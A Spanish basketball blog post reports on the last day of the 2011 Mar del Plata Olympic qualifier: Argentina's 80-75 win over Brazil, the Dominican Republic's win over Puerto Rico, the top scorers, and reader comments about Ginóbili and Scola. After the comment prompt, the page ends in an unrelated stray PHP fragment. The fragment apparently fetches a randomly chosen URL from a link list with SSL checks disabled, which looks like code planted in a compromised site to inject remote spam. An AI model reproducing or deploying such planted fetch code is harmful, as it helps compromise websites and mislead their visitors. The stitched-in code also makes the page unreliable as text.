Preolímpico de Mar del Plata: Argentina campeona

12 de September de 2011 por German

Última jornada de acción en Mar del Plata con dos partidos muy distintos.

Argentina 80 – 75 Brasil: Máxima tensión en el clásico sudamericano. Los dos jugaron como si el pasaporte a Londres estuviera en juego. Pegaron de entrada los locales, con buenas ofensivas (especialmente con Scola, 10 pts en los primeros 10 minutos) y un gran trabajo en defensa (fundamental otra vez Kammerichs, de estupendo torneo) se llevaron el primer cuarto por 21-9. En el segundo empezó a mejorar la defensiva brasileña que controló muy bien a Ginóbili durante todo el partido y sus tiradores encontraron el aro, achicando la desventaja un poco para irse abajo por ocho al descanso (35-27). La segunda mitad siguió al ritmo de Brasil que ejerció una defensa excelente, solamente perforada por Scola que seguía sumando para mantener a los locales arriba por dos puntos al inicio del último periodo (50-48). Rápidamente los visitantes sacaron su máxima ventaja (50-56), instante en el que el público se hizo presente para levantar a los locales que pasaron al frente con un parcial de 7-0. Argentina ajustó su defensa y forzó a su rival a tomar tiros incómodos y así se escapó por 10 a falta de un minuto . El encuentro parecía sentenciado pero Brasil nunca se rindió y un nervioso equipo argentino empezó a fallar tiros libres llegando a tener la posesión el equipo visitante estando abajo por tres puntos. Desgraciadamente para los brasileños en el apuro por tirar y evitar la falta que solo le permitiría acercarse a un punto terminaron perdiendo el balón para el alivio de todos en el estadio. Premio para un grupo de jugadores que están en sus últimos años como profesionales y premio principalmente para el MVP del torneo, Luis Scola, que también terminó como máximo anotador. El combinado brasileño tiene muchísimo potencial, dominaran América los próximos años y habrá que tener cuidado con ellos en Londres, pero muchísimo más todavía en Río 2016.

Destacados:
Luis Scola (32 pts, 4 As, 3 Reb)
Marquinhos Vinicius (17 Pts, 5 Reb, 2 As)

Puerto Rico 89 – 103 República Dominicana: Ya sin presiones ambos equipos jugaron relajados y eso permitió un marcador tan alto. El vencedor dominó de principio a fin, yendo al descanso con ventaja de 53-29. Fue fundamental la altísima efectividad en tiros de tres puntos (11/18) y por supuesto la actuación de Al Horford, figura durante todo el torneo. La segunda mitad estuvo de más y la mayoría de los jugadores tuvieron sus minutos. Los dominicanos se quedan con el bronce y también con la sensación de ser un equipo con alto potencial que, trabajando a conciencia y puliendo los errores infantiles que cometen por momentos, puede llegar a insertarse en torneos grandes a menudo. Además de los NBA tienen en Jack Michael Martínez a un jugador excelente que sin dudas podría tener sus minutos en la mejor liga del mundo. Ha jugado un gran torneo demostrando su calidad tanto en ataque como en defensa.

Destacados:
Al Horford (23 Pts, 12 Reb, 7 As, 2 Rob, 2 Tap)
Jack Michael Martinez (21 Pts, 9 Reb, 2 As)
Carlos Arroyo (24 Pts, 7 As, 3 Reb)

Quinteto ideal elegido por la organización: Marcelinho Huertas, Carlos Arroyo, Manu Ginóbili, Luis Scola, Al Horford

MVP: Luis Scola

Comenta

5 comentarios a esta entrada

  1. TheDeerHunter dice:
    #1

    Últimamente un Brasil-Argentina es sinónimo de partidazo épico.

    Todavía me acuerdo del pasote que fue el del mundobasket.

    La lástima es que haya coincidido con el europeo… y lo complicado de ver uno de esos partidos incluso por internet.

      Citar

  2. Txusma dice:
    #2

    La dupla Ginobili-Scola ha estado a un nivel brutal durante todo el torneo. ¿Ginobili es el mejor jugador argentino de la historia?

      Citar

  3. KG5 dice:
    #3

    Si @txusma, claramente. Ya lo es desde hace varios años. Y me atreveria a decirte que Scola es el segundo tambien.
    Excelente el blog, los sigo siempre aunque no soy de comentar mucho

      Citar

  4. German dice:
    #4

    Sin duda Ginobili es el mejor basquetbolista argentino de la historia, si bien a nivel seleccion ha conseguido lo mismo que Scola creo que inclina la balanza a su favor lo que hizo Manu en la NBA (tres anillos, 2 all star, etc).
    Lo de Luis tambien es fabuloso y para destacar.

      Citar

  5. CARLOS dice:
    #5

    Soy de Mar del Plara y estuve presente en el argetina-puerto Rico de la primera fase. Ginobili es y sera el mejor basquetbolista argentino de la historia y en nuetro pais esta a la altura de Fangio y Maradona. Pero Scola es sin duda el mejor de la historia del seleccionado. 3 veces seguidas MVP de los torneo FIBA AMERICAS (2007/2009/2011) y en este campeonato se convirtió en el máximo anotador historino de la albiceleste superando a Juan Espil. Ademas no falta nunca a ningun torne y este lo jugo luego de una operacion en su rodila. No por nada es el capitan del equipo

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>